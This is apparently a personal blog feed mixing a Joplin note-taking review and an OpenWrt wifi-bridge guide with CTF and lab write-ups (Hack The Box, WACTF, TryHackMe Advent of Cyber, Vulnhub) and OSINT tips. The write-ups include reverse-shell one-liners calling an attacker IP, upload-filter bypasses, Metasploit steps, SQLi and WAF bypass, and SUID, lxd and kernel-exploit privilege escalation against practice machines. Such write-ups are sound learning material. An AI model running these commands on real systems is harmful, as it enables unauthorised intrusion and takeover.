#notes #notetaking #wiki #knowledgemanagement

• Tools I use: Joplin
  • Requirements
  • Joplin Workflow
    • Sync/Backup
    • Shortcomings

Requirements

Some of my personal requirements in a note taking application.

• offline first
• markdown support
• export to pdf, html
• ability to sync to a variety of sources
• package available on GNU/Linux
• low resistance note taking
• folder, subfolder, tagging organisation paradigm
• some cross platform support

Joplin Workflow

The main layout for this application is divided into:

• notebooks (and subnotebooks)
• individual notes (notes or todo format)
• the editor, and the preview pane

That's pretty much it! It lets me focus and get to creating notes, categories, and tags quickly and without any resistance. What do I mean by resistance? Well, not having to do this in a browser is a plus. Also not having to share markdown authoring with with my IDE is also a bonus.

Some examples of my notebooks:

• programming
• cybersecurity
• blog
• ideas
• scratchpad

Sync/Backup

• I sync my joplin files via rsync to my NAS on my local network regularly.
• Joplin also supports S3 sync. I plan to set up cloud-based sync to Backblaze B2 as a secondary storage for my notes as well. The cost for this should be a few cents a month to store. B2 has server-side encryption similar to S3.
  • Stay tuned for a tutorial on this!

Shortcomings

• No git support – since Joplin uses a sqlite database, it is not able to sync with git. Hopefully that can be added in the future!
• Open source, community developed – whilst overall this is a positive, it also means there are some limitations on how and when new things get implemented.

#openwrt #networking #wifi

Introduction

Despite upping my wifi AP game recently (UniFi nanoHD AP) and improving wifi coverage throughout our home, the downstairs media player just wasn't getting the speeds it was capable of. So, instead of changing up the physical location or changing the home network any further, I decided to get my hands drity with OpenWrt and a spare Archer C7 v2 I had instead. I enjoyed the OpenWrt firmware so much, I wanted to write about it here.

What, Why, How?

OpenWrt is a linux based OS for networking devices. I've only ever used UniFi, Tomato, DD-WRT, and Merlin firmwares in my network devices so I was just looking for a project where I could get my hands dirty with OpenWrt. The opportunity presented itself when I realised I had a) a spare Archer C7 gathering dust and b) the media player downstairs sure could use a signal boost.

The media player downstairs has no external antenna which added to the problems of receiving limited 2.4 and 5ghz wifi signal 🙁. Max was around 20mbps down, 15mbps up. Near the same spot on my phone was getting at least 100/30!

The idea in my head was to:

• use the existing unused router and load some custom firmware
• put this device into bridging mode (wifi –> ethernet)
• get the media player to utilise ethernet with the wifi as the “backbone”

A wifi bridge from my understanding is simply bridging the ethernet interface of a device with its WLAN interface/s. This way, ethernet would be switched and relayed out via an existing WLAN network. An existing router and AP do all the heavy lifting e.g. DHCP, DNS, routing. This routing is facilitated by relayd.

General Instructions

Prep:

• target router flashed with openwrt
• patch network cable
• a computer with an ethernet port (or adapter)
• approx 30m

Fortunately, an excellent guide is already available to achieve what I described above:

⭐ https://openwrt.org/docs/guide-user/network/wifi/relay_configuration

The summary of this guide is:

1. go through the initial openwrt setup
2. set up the lan interface with an IP in a different subnet to your home network (e.g 192.168.1.0/24 if you already have a 192.168.0.1/24)
3. join an existing wireless network (wwan)
4. ensure internet connectivity (from openwrt)
5. install relayd and luci-proto-relay
6. add a new relay bridge interface linking lan and wwan together
7. reboot

This should result in all devices attached to the ethernet LAN ports be routed by the relay bridge interface to the main network via an existing wireless network.

Conclusion and Next Steps

The media player now was getting close to 150mbps download and 40mbps upload! Much, much better. Now I can reliably serve files to it wirelessly as well (hopefully soon)! Mission success.

I was really impressed and thankful at the documentation available for this feature by the OpenWrt folks. The firmware is much more polished than I last remembered and would definitely consider switching to this firmware on my other more used network devices.

Next steps:

• set up auto updates of OpenWrt and packages
• see if I can set up a simple file server via the USB port on the Archer C7
• create a shell script equivalent of the above process

Resources

1. OpenWrt for C7 – https://openwrt.org/toh/tp-link/archer-c7-1750
2. Wifi Bridge Guide – https://openwrt.org/docs/guide-user/network/wifi/relay_configuration

TODO – XMLDecoder – CVE-2016-0792 – ObjectInputStream – CVE-2013-0156: Rails Object Injection – API to Shell

#web #pentesterlab #Serialize

XMLDecoder

Java's XMLDecoder can be used to unserliaize data. There are two common methods that can be used to perform code exec: * Runtime.exec() * ProcessBuilder

Steps to reproduce: 1. submit an expected file and check output. If XML check for class=.... If it's XMLDecoder you may be able to utilise the above. 2. Craft an XML file with actions you want the underlying Java runtime to perform.

References:

• https://find-sec-bugs.github.io/bugs.htm#XML_DECODER
• https://www.baeldung.com/run-shell-command-in-java

CVE-2016-0792

• This exploit relied on libraries within java applications that handled unexpected data badly and allowed code execution.
• The key here would have been to test requests to servers by throwing in some unexpected data and then observing the error messages. In this case, error messages would have shown that the command being embedded in the XML was being executed before the application errored out.
• Doing a simple ping or curl on a server you controlled would have shown that the exploit worked and could achieve remote communication.

Enumeration

Initial aim is to collect as much information about the target host as possible. --script vuln can be used to list any common vulnerabilities that nmap can discern. It appears that there are multiple services open, with distccd having a public vulnerability available.

Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-31 07:40 GMT
Nmap scan report for 10.10.10.3
Host is up (0.013s latency).
Not shown: 65530 filtered ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_sslv2-drown: 
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| vulners: 
|   cpe:/a:openbsd:openssh:4.7p1: 
|     	PACKETSTORM:101052	7.8	https://vulners.com/packetstorm/PACKETSTORM:101052	*EXPLOIT*
|     	CVE-2010-4478	7.5	https://vulners.com/cve/CVE-2010-4478
|     	CVE-2008-1657	6.5	https://vulners.com/cve/CVE-2008-1657
|     	SSV:60656	5.0	https://vulners.com/seebug/SSV:60656	*EXPLOIT*
|     	CVE-2017-15906	5.0	https://vulners.com/cve/CVE-2017-15906
|     	CVE-2010-5107	5.0	https://vulners.com/cve/CVE-2010-5107
|     	CVE-2010-4755	4.0	https://vulners.com/cve/CVE-2010-4755
|     	CVE-2012-0814	3.5	https://vulners.com/cve/CVE-2012-0814
|     	CVE-2011-5000	3.5	https://vulners.com/cve/CVE-2011-5000
|     	CVE-2011-4327	2.1	https://vulners.com/cve/CVE-2011-4327
|_    	CVE-2008-3259	1.2	https://vulners.com/cve/CVE-2008-3259
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
| distcc-cve2004-2687: 
|   VULNERABLE:
|   distcc Daemon Command Execution
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2004-2687
|     Risk factor: High  CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
|       Allows executing of arbitrary commands on systems running distccd 3.1 and
|       earlier. The vulnerability is the consequence of weak service configuration.
|       
|     Disclosure date: 2002-02-01
|     Extra information:
|       
|     uid=1(daemon) gid=1(daemon) groups=1(daemon)
|   
|     References:
|       https://nvd.nist.gov/vuln/detail/CVE-2004-2687
|       https://distcc.github.io/security.html
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2687
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: false
|_smb-vuln-regsvc-dos: ERROR: Script execution failed (use -d to debug)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 179.11 second

Exploitation

Since it was observed that distccd is vulnerable and a public exploit is available, this seems like a good path forward. There is also a NSE script that didn't work me sadly.

Exploit: https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855 Metasploit: exploit/unix/misc/distcc_exec

This will give a /bin/sh session as user daemon. The user flag can get obtained via /home/makis/user.txt. Basic privesc can be used to escalate to root.

Privilege Escalation

Upgrade shell: python -c "import pty;pty.spawn('/bin/bash')"

Find SUID binaries: find / -type f -perm -u=s 2>/dev/null

Nmap has SUID bit set. Use this to get an interactive shell as root:

/usr/bin/nmap --interactive
!sh
cat /root/root.txt

Another year of a fantastic WA based CTF made by the community for the community. As always, a lot was enjoyed, keyboards were mashed, and much was learnt. Thanks to all the organisers for making this so special. Only regret is not being able to play in person at Perth 😢.

Forensics

0. Is serverless, is secure (20pts)

To impress his agile DevOps friends, Batman has moved his BatCave computer to a “serverless”. Oh no, someone has managed to write to his intel folders and retrieve all of his intel. Can you work out which user is the naughty agent? Luckily he's got logs enabled and has been identifying his BatCave computer on all requests, so you can rule out BatCaveSuperComputer as the flag.

We are provided with a CloudWatch log file supposedly for the serverless application where data exfil occured (json).

Since I am not too familiar with cloudwatch logs, I devised a quick and dirty way to find the flag:

jq ".events[]"  forensics-0.json | jq .message | grep User-Agent | grep -v "BatCaveSuperComputer" | grep WACTF

The above searches through the json file within “message” that excludes all UserAgent=BatCaveSuperComputer. Turns out we can find the flag this way 😊.

// TODO: learn how to filter or structure these logs. Perhaps uploading them in AWS and using the CloudWatch search UI would allow to make a fancy query.

Crypto

0. It's always the same (20pts)

Crypto is quite tricky, and this is hard for a lvl 0 flag, but such is life. The flag was XORed with the value 0xab, then converted to hex. Can you get the flag out of the ciphertext?

Ciphertext: fceae8ffedd0fce3f2f4e2f8f4e2fff4eae7fceaf2f8f4f3e4f9d6

The ciphertext was produced via plaintext –> XOR(0xab) –> hex. Let's try to reverse this using CyberChef:

Input = fceae8ffedd0fce3f2f4e2f8f4e2fff4eae7fceaf2f8f4f3e4f9d6

Recipe:

1. From Hex
2. XOR with HEX key ab

Output = WACTF{WHY_IS_IT_ALWAYS_XOR}

1. It's always the same... again (100pts)

The flag was XORed with an unknown value, then converted to hex. Can you get the flag out of the ciphertext

Ciphertext: 16000215073a0e0f041e031815041e08121e0f0e151e001e0d001306041e1204001302091e12110002043c

Similar to the previous example but we don't know the XOR key. CyberChef has a XOR Brute Force function we can use!

Input = 16000215073a0e0f041e031815041e08121e0f0e151e001e0d001306041e1204001302091e12110002043c

Recipe:

1. From Hex
2. XOR Brute Force w/ Crib=“WACTF”

Output = Key = 41: WACTF{ONE_BYTE_IS_NOT_A_LARGE_SEARCH_SPACE}

Web

0. Git Good (50pts)

You really have to be good to git this flag. Note: A SMALL amount of directory bruteforcing is required for this challenge.

Service: http://web-0

Search for hidden directories and git files:

ffuf -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt -u http://web-0/FUZZ

Output:

<snip>
env                     [Status: 301, Size: 225, Words: 14, Lines: 8]
<snip>

env looks interesting. We'd expect to see some interesting files in this directory potentially. Since the status is 403 we can't see a directory listing. Let's run ffuf again:

ffuf -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt -u http://web-0/env/FUZZ

Output:

.git/HEAD               [Status: 200, Size: 23, Words: 2, Lines: 2]

Bingo.

I'll use gitjacker to obtain the relevant git files: gitjacker http://web-0/env/

 ██████  ██ ████████   ██  █████   ██████ ██   ██ ███████ ██████  
██       ██    ██      ██ ██   ██ ██      ██  ██  ██      ██   ██ 
██   ███ ██    ██      ██ ███████ ██      █████   █████   ██████  
██    ██ ██    ██ ██   ██ ██   ██ ██      ██  ██  ██      ██   ██ 
 ██████  ██    ██  █████  ██   ██  ██████ ██   ██ ███████ ██   ██
https://github.com/liamg/gitjacker                         v0.0.2

Target:     http://web-0/env/
Local Git:  2.29.2
Output Dir: /tmp/gitjacker299979449

Gitjacking in progress...ls
Operation complete.

Status:            Success
Retrieved Objects: 207
Missing Objects:   0
Pack Data Listed:  true
Repository:        
Remotes:           n/a
Branches:          n/a
User Info:         
  - Name:         wactf
  - Email:        wactf@capture.tf/

You can find the retrieved repository data in /tmp/gitjacker299979449

Git Analysis

• Within .git all that is visible is foo.txt

• Gather list of commits via: git shortlog | grep flag

  • from this we see there was a flag create commit

• git log --grep=flag gives us the commit hash for when the flag was created

• git checkout b97c2a177567ae7d55eb12c3b65a6b74b1198d0a

• we now see flag.txt – yay!

WACTF{isnt_git_great}

1.2. Bird-House (100pts)

IDOR challange

1. create account
2. go to gallery
3. click on first image
4. notice URI: http://web-1-2/images/view/2
5. de-increment the image no. : http://web-1-2/images/view/1
6. Get flag!

2. Hardcoded secrets (150pts)

You have managed to obtain part of the source of this nodejs app. It contains secrets! Use the secrets to to obtain the flag!

Filedrop: web-2.7z Service: http://web-2:3000

function auth (key, fn) {
  if ('SuperSecurePasswordforuseradmin' === key)
    fn(null, { id: '1', name: 'superuser'})
  else
    fn(null, null)
}

app.get('/flag', function(req,res) {
 res.sendFile(__dirname+"/views/flag.html");
});

1. Go to web page
2. For the loginprompt, enter SuperSecurePasswordforuseradmin as the username; leave pw empty
3. sucessfull login!
4. browse to /flag to get our flag

Exploit

0. Strings2Flag

cat encryptor — we find our flag.

1. Springfield Nuclear Power Station (100pts)

1. open the application
2. try some creds out, we can't login
3. notice that it says “debug mode is disabled”
4. try running the application with --debug flag. Debug mode enabled!
5. try logging in again with any creds – still denied.
6. strings exploit-1
7. Notice that login is done via homer user under debug mode.
8. Run program in debug mode, username=homer, password=
9. We're logged in as homer!
10. Press '6' to get flag.

S3 Buckets

• nslookup the website to find out details about where it's hosted and potentially get the S3 URI as well.
• Otherwise, try and check http info to see if the aws region and az can be found
• use aws s3 cp s3://$bucketnameOrURI/file $localpath to see if files can be obtained that are otherwise not readable via cloudfront.

Get started with Cyber Security in 25 Days – Learn the basics by doing a new, beginner friendly security challenge every day leading up to Christmas.

https://tryhackme.com/room/adventofcyber2

Here are my writeups! Happy Holidays folks 🎄

Day 1: #Web #Cookies A Christmas Crisis

• modify basic auth cookie to bypass authentication for user santa.
• cookie format is in hexadecimal which is presented as json when decoded.

Day 2: #Web #RCE The Elf Strikes Back

• login using provided ID via GET parameter.
• set up a simple php reverse shell
• bypass upload filter by adding .jpg before true extension.
• set up ncat listener: rlwrap ncat -lvnp $PORT
• visit upload directory and open uploaded php reverse shell.
• get www-data shell and get flag.

Day 3: #Web #Authentication Christmas Chaos

• attempt login and capture login URI.
• utilise burp cluster bomb with 2 payload sets for: username and password.
• run attack and compare response length to find correct credentials.
• login using these credentials for flag

Day 4: #Web #Fuzzing Santa's Watching

• scan for common directories —> find /api
• api file site-log.php used for querying site logs by date
• fuzz probable dates using wfuzz: wfuzz -c -z file,$WORDLIST -u $URI/api/site-log.php?date=FUZZ

Day 5: #Web #SQLi Someone stole Santa's gift list!

• bypass login using basic SQLi payload
• use info provided to launch sqlmap against the search parameter.
• burp –> capture request –> send to repeater –> save request.
• sqlmap -r $saved_request --tamper=space2comment --dump-all -dbms sqlite.
  • space2comment is a WAF bypass method. This can be identified via --identify-waf.
  • other WAF bypasses are available where needed.
• use db dumps to answer all questions.

Day 6: #Web #XSS Be careful with what you wish on a Christmas night

• web app is vulnerable to both reflected and stored XSS.
• OWASP ZAP can be used for automated scanning.
• The original compromise most likely utilised the stored XSS vulnerability and redirected a visitor to a malicious website upon clicking a certain hyperlink (by modifying <a> tags or by doing something like location.replace).

Day 7: #Networking #Wireshark The Grinch Really Did Steal Christmas

We're given 3 pcaps that need to be analysed.

pcap1

• find icmp traffic – type icmp in filter bar
• find all HTTP GET requests – http.request.method == GET
• find web pages visited (HTTP) by specific host – ip.src == 10.10.67.199 && http.request.method == GET

pcap 2

• find plaintext password in ftp traffic – ftp.request.command==PASS
• find encrypted protocol used – statistics > protocol hierarchy (from this we see SSH which is an encrypted protocol)

pcap 3

• recover files sent in the wire – file > export objects > http

Day 8: #Networking #nmap #enumeration What's Under the Christmas Tree?

A quick recap of nmap:

• -sT – TCP scan
• -sS – SYN scan – default
• -A – aggressive scan (includes OS, version, script and traceroute scans)
• --script vuln – scan for common vulnerabilities on open ports
  • additional scripts: enip-info, rdp-ntlm-info, http-enum
  • tip: you can use * as a wildcard when using --script.

Day 9: #Networking #ftp Anyone can be Santa!

• find anonymous ftp directories using nmap $IP -sV --script=ftp-anon
• ftp in and retrieve backup.sh
• set up reverse shell on local host: rlwrap ncat -lnvp 4242
• upload backup script back to the ftp server with an added bash reverse shell: sh -i >& /dev/udp/$THM_IP/4242 0>&1
• we should get a root shell on remote host this way.

Day 10: #Networking #smb Don't be sElfish!

enum4linux -U $IP – enumerate users on SMB server enum4linux -S $IP – enumerate shares on SMB server smbclient //$IP/$ShareName – connect to SMB share

Day 11: #Networking #privesc The Rogue Gnome

• we're given details to log in to ssh as the cmatic user.
• it appears to be a limited account without any sudo access, let's send over LinEnum.sh to automate enumeration for us.
• on the target machine: nc -l -p 1337 > /tmp/LinEnum.sh
• on the attacking machine: nc -w 3 $machineIP 1337 < LinEnum.sh
• The above should send the file from our machine to the target machine via nc (timeout -w at 3 secs)
• SUID enumeration reveals /bin/bash has SUID bit set
• With /bin/bash -p we get a root shell. The -p tells the shell to maintain the euid which in this case is 0 (root) due to SUID.

Day 12: #Networking #initialaccess Ready, Set, Elf

• nmap (-sC -sV)
• we see tomcat 9.0.17 being used
• searching that in exploit-db we find possible code exec CVEs

metasploit:

msfconsole
search CVE-2019-0232
use exploit/windows/http/tomcat_cgi_cmdlineargs
set lhost tun0
set rhost $remotehostIP
set URI $remotehostCGI
check
exploit
shell

the above gets us a user shell. Check privs with run post/windows/gather/win_privs

Day 13: #exploitation Coal for Christmas

• scan machine with nmap – notice telnet
• connect to telnet and log in with creds displayed
• Enumuration tips:
  • cat /etc/*release
  • cat /etc/issue
• Ubuntu 12.04 with kernel 3.2.0-23-generic – vulnerable to dirtyc0w.
• Transfer dirtyc0w source code to target machine and compile
• run and create a root privileged account!

Day 14: #osint Where's Rudolph?

• https://scylla.sh/ – neat place to find dehashed passwords.
• always check the entire post history of an account if possible.

Day 15 & 16: #python

#!/usr/bin/env python3
## TryHackMe Advent Calendar 2020 Day 16
## https://tryhackme.com/room/adventofcyber2

import requests

# The code below assumes an api endpoint with a odd-numbered key that we don't know the value of. The correct value will produce a flag.
# for loop to go over 1-100 key values, step by 2 to have odd numbers only

for api_key in range(1,100,2):
    # print what api key value we are iterating
    print(f"api_key {api_key}")
    # this is the api endoing we are sending requests to
    r = requests.get(f'http://EDITME_THMIP:8000/api/{api_key}')
    # only print text out if there are no failures or protections in place
    if "Error" not in str(r.text) and "PROTECTION" not in str(r.text):
        print(r.text)

Day 19: #SSRF #web The Naughty or Nice List

1. Observe that searches are proxied internally via http://list.hohoho:8080/search.php?name=.
2. Since an internal server is exposed, there are numerous things to do:
   • visit root of the host exposed e.g. http://list.hohoho:8080 via the URI parameter.
   • try different ports for enumeration.
   • check for any app side blocking/filtering e.g. visiting localhost via the proxy. If blocked, consider using localtest.me which resolves to 127.0.0.1 e.g. proxy=http://list.hohoho.localtest.me
   • this could lead to some sensitive exposure.

Day 17 & 18: #reversing #assembly #dotnet ReverseELFneering & The Bits of Christmas

Opening a binary with radare2 – r2 -d <file> Analysing a binary – aa List of functions – afl Print disassembly function – pdf @<function> Breakpoint – db <reference> Run program until breakpoint – dc View contents of memory address – px @<memory address> Move to next instruction – ds View %eax register – dr Reload program – ood

For DotNet applications, ILSpy and Dotpeek are good tools that can be used to decompile .NET applications and potentially view methods that contains information to bypass certain checks or authentication.

Day 20: #powershell PowershELlF to the rescue

Some intro to powershell and navigating the file and directory system:

Get-ChildItem -Path <> -File/-Directory -Hidden -ErrorAction SilentlyContinue The above would look for all items in a specified path that has either hidden files or folders and would not worry about any errors.

Measure-Object Can be piped to provide info on an object like words e.g. Get-Content file.txt | Measure-Object -Word

(Get-Content -Path file.txt)[index] Read something in a file at a specfic position. E.g. ...file.txt)[100] for the 99th character.

Select-String -Path ./Desktop -Pattern '*.txt' Find all txt files within the desktop. Can also be used to search for strings within a file.

Day 21: #forensics #powershell Time for some ELForensics

• ADFS is a part of NTFS and can contain alternate data streams not visible to the user. Calculate MD5: Get-FileHash -Algorithm MD5 <file> View streams: Get-Item -Path file.exe -Stream * Launch the stream/s found: wmic process call create $(Resolve-Path file.exe:streamname)

Day 22: #forensics Elf McEager becomes CyberElf

Data decoding via https://gchq.github.io/CyberChef/

Day 23: #forensics The Grinch strikes again!

• malicious scheduled tasks may often be utilised by ransomware operators.
• volume shadow copy service (VSS) creates “snapshots” of data. This can be interacted with using vssadmin
• for any hidden volumes, they may be able to have a drive path assigned to them and mounted. Checking for hidden files and folders is also advisable in that volume.

Day 24

Find hidden web directories and php pages:

gobuster dir -u http://10.10.216.164:65000 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt

gobuster dir -u http://10.10.216.164:65000 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt -x php

Visit the discovered file upload page and try to upload a reverse PHP shell. A simple file rename to .jpg.php doesn't work. See network connections and notice filter.js. Block this to circumvent the client side filter. Visit the file once shell is uploaded and reverse shell listener is set up.

rlwrap ncat -nlvp 1234

Upgrade shell:

python3 -c 'import pty; pty.spawn("/bin/bash")'

After finding the DB creds in the includes folder, connect to it using MySQL client.

$ msql -utron -p
$ show databases;
$ use tron;
$ show tables;
$ select * from users;

We find the user flynn's hashed password which can be cracked via crackstation. Using these credentials, SSH into localhost (or use su flynn). The flyn user is in the lxd group, allowing us to interact with linux containers (lxc).

$ lxc image list # see if there are any images we can use
$ lxc init $IMAGENAME $CONTAINERNAME -c security.privileged=true # create a new priv. container
$ lxc config device add $CONTAINERNAME $DEVICENAME disk source=/ path=/mnt/root recursive=true # add mounted device with path = root
$ lxc start $CONTAINERNAME
$ lxc exec $CONTAINERNAME /bin/sh # connect to the container shell 

Aimed at Beginner Security Professionals who want to get their feet wet into doing some CTF's. It should take around 30 minutes to root.

enum

• nmap
• ssh + http; not much else to be seen here
• webpage enumerate: robots.txt, index html source
• find directory via index source (html comment)

exploit

• it appears that the original developer wanted to ping via a web service on the server
• try common terms used for this e.g ?command= or ?exec=
• ?cmd=id works; also looks like we have nc (which nc)
• listener: rlwrap ncat -nlvp $PORT
• reverse shell: nc -e /bin/sh $ATTACKING-IP $PORT
• we're in with user www-data
• grab user flag

privesc

• spawn a tty (we have python): python -c 'import pty; pty.spawn("/bin/sh")'
• look for SUID binaries: find / -user root -perm -4000 -print 2>/dev/null
• notable binaries: grep and find
• both have entries on gtfobins
• use find to spawn a root shell:

find . -exec /bin/sh -p \; -quit

• grab root flag

#vulnhub #php #suid

Boot2Root ! This can be a real life scenario if rockies becomes admins. Easy going in round about 15 mins. Bit more, if you are find and stuck in the rabbit-hole first.

enumeration

• nmap
• find anon ftp access
• get all zip files – they contain id_rsa keys but are password protected

initial access

• use /usr/sbin/zip2john to get hashes of all zip files
• use john to crack these hashes using your favourite wordlist
• user tom's zip file could be successfully cracked
• extract id_rsa with password
• chmod 600 id_rsa && ssh -i id_rsa $VulnHubIP -v
• we're in 🔓
• grab local.txt

privesc

• sudo -l – prompted for tom's password which we don't have yet
• check all files in directory ls -la
• investigate .bash_history and .mysql_history
• looks like we see a password in mysql history
• we have excessive sudo privileges
• sudo su -l and grab proof.txt 🔚

#vulnhub #ssh #sudo

It covers some tips, strategies, and common mistakes to avoid in order to get the most out of OSINT CTFs.

#osint #ctf

Tips

1. Zoom! Enhance
2. There is no substitution for scrolling
   • scroll geolocated posts on IG
   • scroll profile posts+tweets
3. Screen cap or it didn't happen.
4. Link usernames to other profiles.
5. Family trees have handy information

Takeaways

Collection

• Annotations are fine on screenshots for proof. However, evaluate the time it will take vs being able to concisely provide links and information using text.

Tools

• Tools aren't really required to do good OSINT work. It ends up just complicating your workflow. Focus on good analysis.

Strategy

• You should be able to submit a few hundred points in the first 30 mins. If you can't the subject may not have enough information to analyse.

• Sometimes you cannot submit the same link twice. To get around this, submit a link to the specific post or information. This can sometimes be done via permalinks and via embed/share options.

• Aim for 150-200 points in the first 20 minutes. This creates a good feedback loop for your brain to keep looking.

• Low point flags must be submitted — STACK and LAYER until you hit a wall. Rinse and repeat.

• Aim: decrease Time:Points ratio.

Submissions

• Build your case with low point flags e.g. facebook profile —> confirmed. Utilise this to build bigger flags and mention that “since the fb account was confirmed previously...”

• You won't always have the same judge. Therefore, always substantiate – especially towards the end.

• Create rapport with your judge where possible. E.g. a group chat with the judge and your team in Slack (DM).

Submission Example

e.g. sister's fb page

• Screenshot of information [the flag]
• Proof = public link to sister's fb page
• Relevance = “there could potentially be comments or interactions on this facebook page relating to the subject”
• Substantiation / Evidence = Include a link to the specific page and write how this is showing the above e.g. sister is talking about the brother 2 weeks before they disappeared.

Analysis

• Make sure you are able to get foundational flags correct and verified. All future and potentially larger flags will depend on this foundation.